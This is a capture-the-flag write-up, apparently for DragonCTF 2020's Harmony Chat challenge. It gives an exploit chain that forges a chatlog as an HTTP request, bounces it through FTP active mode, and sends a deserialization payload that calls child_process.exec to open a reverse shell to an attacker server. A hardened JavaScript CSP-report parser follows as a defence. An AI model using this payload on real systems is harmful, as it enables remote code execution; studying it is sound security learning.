* RCE is achievable via insecure deserialization on the /csp-report endpoint of their HTTP server  
* Make a chatlog that looks exactly like a POST request to that endpoint, with a reverse-shell payload in it (I made 5 users with names like ``POST /csp-report?``, ``Host``, etc.). Downloading the chatlog via FTP puts the file on the server.  
* Connect to their FTP server externally. Use FTP in active mode (PORT command) to send the chatlog to the application's HTTP server.  
* Reverse shell. Profit.

Payload:
```
POST /csp-report?: HTTP/1.1
Host: localhost:3380
Content-Length: 386
Content-Type: application/csp-report

{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-directive": "X",
"original-policy": "X", "referrer": "X", "status-code": "X", "violated-directive": "X",
"source-file": {"toString": {"___js-to-json-class___": "Function", "json":
"process.mainModule.require(\"child_process\").exec(\"REDACTED <YOURSERVERHERE> REDACTED \", {stdio:\"inherit\"})"}}}}
```
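The root cause is a JSON deserializer that revives objects tagged with `___js-to-json-class___` into live classes, so a `Function` tag inside a CSP report becomes executable code. The following is an added example (not the challenge's code) of how a `/csp-report` handler should parse that body instead: plain `JSON.parse` with no reviver, the class marker rejected at any depth, and an assumed allowlist of scalar report fields.

```javascript
// Added example: hardened parsing of a CSP report body. Not the challenge's
// own server code; the field allowlist is an assumption based on common
// CSP report keys.

const CLASS_MARKER = "___js-to-json-class___";

// Assumed allowlist of report fields; everything else is dropped.
const ALLOWED_FIELDS = new Set([
  "blocked-uri", "document-uri", "effective-directive", "original-policy",
  "referrer", "status-code", "violated-directive", "source-file",
  "line-number", "column-number", "script-sample", "disposition",
]);

// Walk the parsed tree and refuse any object carrying the class-revival marker.
function assertNoClassMarker(value, path = "$") {
  if (value === null || typeof value !== "object") return;
  if (Array.isArray(value)) {
    value.forEach((v, i) => assertNoClassMarker(v, `${path}[${i}]`));
    return;
  }
  for (const key of Object.keys(value)) {
    if (key === CLASS_MARKER) throw new Error(`class marker rejected at ${path}`);
    assertNoClassMarker(value[key], `${path}.${key}`);
  }
}

// Returns a flat object of string fields, or throws on anything suspicious.
function parseCspReport(body) {
  const parsed = JSON.parse(body);           // no reviver: nothing is "revived"
  assertNoClassMarker(parsed);
  const report = parsed && parsed["csp-report"];
  if (!report || typeof report !== "object" || Array.isArray(report)) {
    throw new Error("missing csp-report object");
  }
  const clean = {};
  for (const [k, v] of Object.entries(report)) {
    if (!ALLOWED_FIELDS.has(k)) continue;                   // drop unknown keys
    if (typeof v !== "string" && typeof v !== "number") {   // scalars only
      throw new Error(`field ${k} must be a scalar`);
    }
    clean[k] = String(v);
  }
  return clean;
}

// Constructed sample bodies: a benign report and the shape of the payload above.
const BENIGN = JSON.stringify({ "csp-report": { "document-uri": "https://example.test/",
  "blocked-uri": "inline", "violated-directive": "script-src" } });
const MALICIOUS = JSON.stringify({ "csp-report": { "blocked-uri": "x",
  "source-file": { "toString": { [CLASS_MARKER]: "Function", "json": "/* code */" } } } });

function isAccepted(body) { try { parseCspReport(body); return true; } catch (e) { return false; } }
```

Even without the marker, a nested object where a scalar is expected (as in `source-file` above) is rejected, so the check does not depend on knowing the deserializer's exact tag.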

Comprehensive writeup
[here](https://ubcctf.github.io/2020/11/dragonctf2020-harmony_chat/)